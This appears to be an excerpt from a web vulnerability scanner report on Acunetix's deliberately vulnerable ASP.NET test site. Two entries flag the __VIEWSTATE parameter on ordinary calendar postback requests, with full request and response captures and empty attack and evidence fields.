Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1107 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,107 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8467&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBAmebnGdsIHgJTRBYBBgCAfQ9oH9sIZGRkPjhgBHI5liQMGfm0N44CX3jVKAU%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwL7sLywBQLRp67yDgLQp%2BbjBwLcy%2BvqAgLcy%2BvqAgLcy9%2FTDwLcy9%2FTDwLcy%2FP2CALcy%2FP2CAKx0t2fCgKx0t2fCgKx0vGyAwKx0vGyAwKx0uXJDAKx0uXJDAKx0pnsBQKx0pnsBQKx0o2DDQKx0o2DDQKx0qGmBgKx0qGmBgKx0tX6DwKx0tX6DwKx0smRBwKx0smRBwKx0r35BQKx0r35BQKx0tGdDQKx0tGdDQKK%2BaMFAor5owUCivnX2QkCivnX2QkCivnL%2FAICivnL%2FAICivn%2FkwoCivn%2FkwoCivmTtgMCivmTtgMCivmHzQwCivmHzQwCivm74AUCivm74AUCivmvhw0Civmvhw0CivmD7AsCivmD7AsCivm3gwMCivm3gwMCv5PjxAkCv5PjxAkCv5OXmwECv5OXmwECv5OLvgoCv5OLvgoCv5O%2F1QMCv5O%2F1QMCv5PT6QwCv5PT6QwCv5PHjAQCv5PHjAQCv5P7ow0Cv5P7ow0Cv5PvxgYCv5PvxgYCv5PDrwMCv5PDrwMCv5P3wgwCv5P3wgwCkLrB6w8CkLrB6w8CkLr1jgcCkLr1jgcCkLrpJQKQuuklApC6nfgJApC6nfgJApC6sZ8BApC6sZ8BApC6pbIKApC6pbIKApC62dYDApC62dYDApC6ze0MApC6ze0MApC6odUJApC6odUJWhkRO0H7R40QFlFN385tcH8cHPE%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:13:22 GMT Content-Length: 12504
Response Body - size: 12,504 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBAmebnGdsIHgJTRBYBBgCAfQ9oH9sIZGRkPjhgBHI5liQMGfm0N44CX3jVKAU=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwL7sLywBQLRp67yDgLQp+bjBwLcy+vqAgLcy+vqAgLcy9/TDwLcy9/TDwLcy/P2CALcy/P2CAKx0t2fCgKx0t2fCgKx0vGyAwKx0vGyAwKx0uXJDAKx0uXJDAKx0pnsBQKx0pnsBQKx0o2DDQKx0o2DDQKx0qGmBgKx0qGmBgKx0tX6DwKx0tX6DwKx0smRBwKx0smRBwKx0r35BQKx0r35BQKx0tGdDQKx0tGdDQKK+aMFAor5owUCivnX2QkCivnX2QkCivnL/AICivnL/AICivn/kwoCivn/kwoCivmTtgMCivmTtgMCivmHzQwCivmHzQwCivm74AUCivm74AUCivmvhw0Civmvhw0CivmD7AsCivmD7AsCivm3gwMCivm3gwMCv5PjxAkCv5PjxAkCv5OXmwECv5OXmwECv5OLvgoCv5OLvgoCv5O/1QMCv5O/1QMCv5PT6QwCv5PT6QwCv5PHjAQCv5PHjAQCv5P7ow0Cv5P7ow0Cv5PvxgYCv5PvxgYCv5PDrwMCv5PDrwMCv5P3wgwCv5P3wgwCkLrB6w8CkLrB6w8CkLr1jgcCkLr1jgcCkLrpJQKQuuklApC6nfgJApC6nfgJApC6sZ8BApC6sZ8BApC6pbIKApC6pbIKApC62dYDApC62dYDApC6ze0MApC6ze0MApC6odUJApC6odUJWhkRO0H7R40QFlFN385tcH8cHPE=" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8432')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">March 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8491')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8457')" style="color:Black" title="February 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8458')" style="color:Black" title="February 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8459')" style="color:Black" title="February 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8460')" style="color:Black" title="March 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8461')" style="color:Black" title="March 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8462')" style="color:Black" title="March 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8463')" style="color:Black" title="March 04">4</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8464')" style="color:Black" title="March 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8465')" style="color:Black" title="March 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8466')" style="color:Black" title="March 07">7</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8467')" style="color:White" title="March 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8468')" style="color:Black" title="March 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8469')" style="color:Black" title="March 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8470')" style="color:Black" title="March 11">11</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8471')" style="color:Black" title="March 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8472')" style="color:Black" title="March 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8473')" style="color:Black" title="March 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8474')" style="color:Black" title="March 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8475')" style="color:Black" title="March 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8476')" style="color:Black" title="March 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8477')" style="color:Black" title="March 18">18</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8478')" style="color:Black" title="March 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8479')" style="color:Black" title="March 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8480')" style="color:Black" title="March 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8481')" style="color:Black" title="March 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8482')" style="color:Black" title="March 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8483')" style="color:Black" title="March 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8484')" style="color:Black" title="March 25">25</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8485')" style="color:Black" title="March 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8486')" style="color:Black" title="March 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8487')" style="color:Black" title="March 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8488')" style="color:Black" title="March 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8489')" style="color:Black" title="March 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8490')" style="color:Black" title="March 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8491')" style="color:Black" title="April 01">1</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8492')" style="color:Black" title="April 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8493')" style="color:Black" title="April 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8494')" style="color:Black" title="April 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8495')" style="color:Black" title="April 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8496')" style="color:Black" title="April 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8497')" style="color:Black" title="April 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8498')" style="color:Black" title="April 08">8</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1115 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,115 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8471&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBAmebnGdsIHgJTRBYBBgCAJLmMItsIZGRkQ0hZLZN4Ok0culxvA9a%2BFmX8qlY%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKMibfwBQLRp67yDgLQp%2BbjBwLcy%2BvqAgLcy%2BvqAgLcy9%2FTDwLcy9%2FTDwLcy%2FP2CALcy%2FP2CAKx0t2fCgKx0t2fCgKx0vGyAwKx0vGyAwKx0uXJDAKx0uXJDAKx0pnsBQKx0pnsBQKx0o2DDQKx0o2DDQKx0qGmBgKx0qGmBgKx0tX6DwKx0tX6DwKx0smRBwKx0smRBwKx0r35BQKx0r35BQKx0tGdDQKx0tGdDQKK%2BaMFAor5owUCivnX2QkCivnX2QkCivnL%2FAICivnL%2FAICivn%2FkwoCivn%2FkwoCivmTtgMCivmTtgMCivmHzQwCivmHzQwCivm74AUCivm74AUCivmvhw0Civmvhw0CivmD7AsCivmD7AsCivm3gwMCivm3gwMCv5PjxAkCv5PjxAkCv5OXmwECv5OXmwECv5OLvgoCv5OLvgoCv5O%2F1QMCv5O%2F1QMCv5PT6QwCv5PT6QwCv5PHjAQCv5PHjAQCv5P7ow0Cv5P7ow0Cv5PvxgYCv5PvxgYCv5PDrwMCv5PDrwMCv5P3wgwCv5P3wgwCkLrB6w8CkLrB6w8CkLr1jgcCkLr1jgcCkLrpJQKQuuklApC6nfgJApC6nfgJApC6sZ8BApC6sZ8BApC6pbIKApC6pbIKApC62dYDApC62dYDApC6ze0MApC6ze0MApC6odUJApC6odUJEW%2BmGpqKTsNvBKmUT%2Fuh7n20%2F0c%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:25:02 GMT Content-Length: 12504
Response Body - size: 12,504 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBAmebnGdsIHgJTRBYBBgCAJLmMItsIZGRkQ0hZLZN4Ok0culxvA9a+FmX8qlY=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKMibfwBQLRp67yDgLQp+bjBwLcy+vqAgLcy+vqAgLcy9/TDwLcy9/TDwLcy/P2CALcy/P2CAKx0t2fCgKx0t2fCgKx0vGyAwKx0vGyAwKx0uXJDAKx0uXJDAKx0pnsBQKx0pnsBQKx0o2DDQKx0o2DDQKx0qGmBgKx0qGmBgKx0tX6DwKx0tX6DwKx0smRBwKx0smRBwKx0r35BQKx0r35BQKx0tGdDQKx0tGdDQKK+aMFAor5owUCivnX2QkCivnX2QkCivnL/AICivnL/AICivn/kwoCivn/kwoCivmTtgMCivmTtgMCivmHzQwCivmHzQwCivm74AUCivm74AUCivmvhw0Civmvhw0CivmD7AsCivmD7AsCivm3gwMCivm3gwMCv5PjxAkCv5PjxAkCv5OXmwECv5OXmwECv5OLvgoCv5OLvgoCv5O/1QMCv5O/1QMCv5PT6QwCv5PT6QwCv5PHjAQCv5PHjAQCv5P7ow0Cv5P7ow0Cv5PvxgYCv5PvxgYCv5PDrwMCv5PDrwMCv5P3wgwCv5P3wgwCkLrB6w8CkLrB6w8CkLr1jgcCkLr1jgcCkLrpJQKQuuklApC6nfgJApC6nfgJApC6sZ8BApC6sZ8BApC6pbIKApC6pbIKApC62dYDApC62dYDApC6ze0MApC6ze0MApC6odUJApC6odUJEW+mGpqKTsNvBKmUT/uh7n20/0c=" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8432')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">March 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8491')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8457')" style="color:Black" title="February 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8458')" style="color:Black" title="February 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8459')" style="color:Black" title="February 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8460')" style="color:Black" title="March 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8461')" style="color:Black" title="March 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8462')" style="color:Black" title="March 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8463')" style="color:Black" title="March 04">4</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8464')" style="color:Black" title="March 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8465')" style="color:Black" title="March 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8466')" style="color:Black" title="March 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8467')" style="color:Black" title="March 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8468')" style="color:Black" title="March 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8469')" style="color:Black" title="March 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8470')" style="color:Black" title="March 11">11</a></td></tr><tr><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8471')" style="color:White" title="March 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8472')" style="color:Black" title="March 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8473')" style="color:Black" title="March 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8474')" style="color:Black" title="March 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8475')" style="color:Black" title="March 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8476')" style="color:Black" title="March 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8477')" style="color:Black" title="March 18">18</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8478')" style="color:Black" title="March 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8479')" style="color:Black" title="March 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8480')" style="color:Black" title="March 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8481')" style="color:Black" title="March 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8482')" style="color:Black" title="March 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8483')" style="color:Black" title="March 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8484')" style="color:Black" title="March 25">25</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8485')" style="color:Black" title="March 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8486')" style="color:Black" title="March 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8487')" style="color:Black" title="March 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8488')" style="color:Black" title="March 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8489')" style="color:Black" title="March 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8490')" style="color:Black" title="March 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8491')" style="color:Black" title="April 01">1</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8492')" style="color:Black" title="April 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8493')" style="color:Black" title="April 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8494')" style="color:Black" title="April 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8495')" style="color:Black" title="April 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8496')" style="color:Black" title="April 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8497')" style="color:Black" title="April 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8498')" style="color:Black" title="April 08">8</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
